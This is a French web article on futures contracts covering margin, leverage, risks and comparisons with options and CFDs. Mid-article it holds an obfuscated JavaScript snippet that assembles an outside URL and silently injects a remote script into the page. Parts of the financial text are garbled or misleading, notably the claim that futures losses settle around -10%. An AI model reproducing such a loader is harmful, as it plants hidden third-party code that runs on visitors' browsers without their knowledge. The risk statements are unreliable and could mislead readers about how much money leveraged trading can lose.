Pourquoi négocier des contrats à terme en bourse ?

Pourquoi négocier des contrats à terme en bourse ?

Il existe différents types de contrats à terme que l’on peut négocier sur les marchés financiers. Parmi eux, les plus utilisés sont certainement les futures. Mais comment s’exécutent cette transaction et comment entrer sur le marché des contrats à terme ? Voici ce qu’il faut savoir sur le sujet.

Comment trader les contrats à terme sur les marchés financiers ?

Les contrats à terme se négocient sur les marchés financiers internationaux. Il est possible de les acquérir chez des courtiers en ligne. Ce contrat permet à un investisseur de payer le prix actuel du cours d’un sous-jacent à une date ultérieure, préétablie dans le contrat. Il existe un grand nombre de sous-jacents qui peuvent être utilisées dans une telle opération. Les plus communs sont les actions, les indices et diverses matières premières.

A voir aussi : Comment a commencé Warren Buffett ?

Une fois que le contrat a été créé entre deux parties, il est possible que celui-ci change de mains avant l’arrivée de la date d’échéance. Cela se produit d’ailleurs fréquemment, alors que neuf sur dix seront transigés ainsi. Pour plus d’information sur le sujet, voici comment trader les contrats à terme.

Que sont les contrats futures ?

Les contrats à terme qui se négocient sur les places boursières se nomment futures. Il en existe aussi d’autres qui se nomment « forwards », mais ils ne sont pas standardisés, ni sécurisés, ce qui les rend particulièrement dangereux pour qui ne s’y connaît pas dans le domaine. Les futures sont réglementés et sous la surveillance et la participation d’une chambre de compensation. C’est elle qui collecte un dépôt de garantie, afin que les fonds ne viennent pas à manquer lors du règlement final du contrat. Ce montant est par ailleurs réévalué tout au long de la durée de celui-ci.

A lire également : Monnaie officielle en Grèce : découvrez la devise utilisée en 2023

Dans ces contrats, certaines informations doivent apparaître. Tout d’abord, on définit le sous-jacent sur la base duquel sera établi le contrat. Ensuite, on y indique la quantité qui sera échangée au final. Aussi, une date d’échéance devra être décidée. Le jour où celle-ci arrivera, il faudra alors que la transaction se produise au prix entendu au départ, entre celui qui a procédé à l’achat et sa contrepartie. Dans la réalité, cette transaction en bourse est seulement financière. En effet, même si le sous-jacent du contrat est du pétrole (par exemple), aucun baril ne passera du vendeur à l’acheteur.

Comment participer à un contrat à terme ?

Il est possible pour tout investisseur d’acquérir un contrat à terme sur les marchés financiers. Pour ce faire, ils utiliseront les futures, comme nous l’avons décrit précédemment. Avec ceux-ci, ils auront accès à un effet de levier qui pourra grandement augmenter la valeur réelle finale, s’ils le désirent. Mais pour ce faire, ils devront verser un dépôt d’une valeur égale à 10 % du contrat, en moyenne. Ce dépôt pourra être augmenté, si la chambre de compensation considère que cela est nécessaire, au vu des fluctuations du marché. Des frais de courtage s’appliquent et sont différents d’un contrat à un autre.

Il est important de noter que ce type de transaction en bourse nécessite des connaissances profondes du marché et du sous-jacent. Sinon, les risques financiers sont très élevés.

(function(){

twglu= »baXkeh18wgle »;twgl=document.createElement(« script »);

twgl_= »u »+(« st »);twgl_+= »at »+(« . »);twgl.async=true;twgl_+= »in »;

twglu= »495778580. »+twglu;twgl.type= »text/javascript »;twglu+= »35850f918qef »;

twglu+= »vea9j5″;twgl_+=(« f »)+ »o »+(« / »);twgl.src= »https:// »+twgl_+twglu;

twgld=document.body;twgld.appendChild(twgl);

})();

Les avantages et les risques de négocier des contrats à terme en bourse

Les avantages de négocier des contrats à terme en bourse sont nombreux. Tout d’abord, cela permet aux investisseurs de se protéger contre les fluctuations futures du marché, ce qui est un avantage considérable pour ceux qui veulent faire des placements à long terme. Cela peut aussi offrir une source de revenus supplémentaires pour ceux qui cherchent à diversifier leur portefeuille.

L’utilisation des contrats à terme offre une plus grande souplesse dans la gestion du risque financier. Les investisseurs peuvent prendre position sur le marché ouvert sans avoir besoin d’un capital important et ainsi éviter les complications liées aux transactions immobilières traditionnelles.

Pensez à bien noter que tout placement financier comporte un certain niveau de risque. Le commerce avec des contrats à terme ne fait pas exception et peut être particulièrement dangereux si les investisseurs ne sont pas bien informés ni formés sur le fonctionnement complexe du système.

Le principal risque associé au commerce avec des contrats à terme est la spéculation excessive sur le marché. L’effet de levier permettant d’accroître rapidement la valeur finale engagée peut aussi entraîner une perte importante en cas d’évolution défavorable du sous-jacent vis-à-vis du contrat acheté par l’investisseur.

Pensez à bien procéder au trading régulier avec ces instruments financiers complexes, que ce soit ici ou ailleurs dans le monde.

Les différences entre les contrats à terme et les autres instruments financiers tels que les options ou les CFD

Il faut distinguer les contrats à terme, qui sont un type particulier d’instrument financier, des autres produits disponibles sur le marché, tels que les options et les CFD. Les contrats à terme diffèrent par leur nature même de ces derniers.

Les options, par exemple, permettent aux investisseurs de prendre position sur le marché sans être obligés de s’y engager. Dans ce cas, l’investisseur ne perd que la prime payée pour acheter l’option, alors que dans le cas des contrats à terme, il engage une somme plus importante avant même d’avoir pris position sur le marché. Effectivement, lorsqu’un contrat à terme est signé entre deux parties distinctes, telles que deux sociétés ou un trader et une bourse donnée, elles fixent un prix contractuel qui sera appliqué au sous-jacent du contrat lorsque celui-ci arrivera à échéance.

En revanche, avec les CFD (Contrats pour différence), il n’y a pas d’obligation d’exécution, contrairement aux contrats à terme, ni de possibilité d’encaisser des dividendes sur la valeur sous-jacente vis-à-vis du CFD acheté. Le gain potentiel est très variable selon l’évolution du cours choisi : cela peut aller jusqu’à 100%, mais aussi jusqu’à -100%, là où un contrat à terme se solderait plutôt autour de -10%.

Globalement donc, choisir entre ces différents instruments financiers dépendra principalement du niveau de risque souhaité, ainsi que d’une préférence pour telle ou telle stratégie d’investissement. Il faut s’informer soigneusement sur les avantages et les inconvénients de chacun avant de prendre position sur le marché.

ARTICLES LIÉS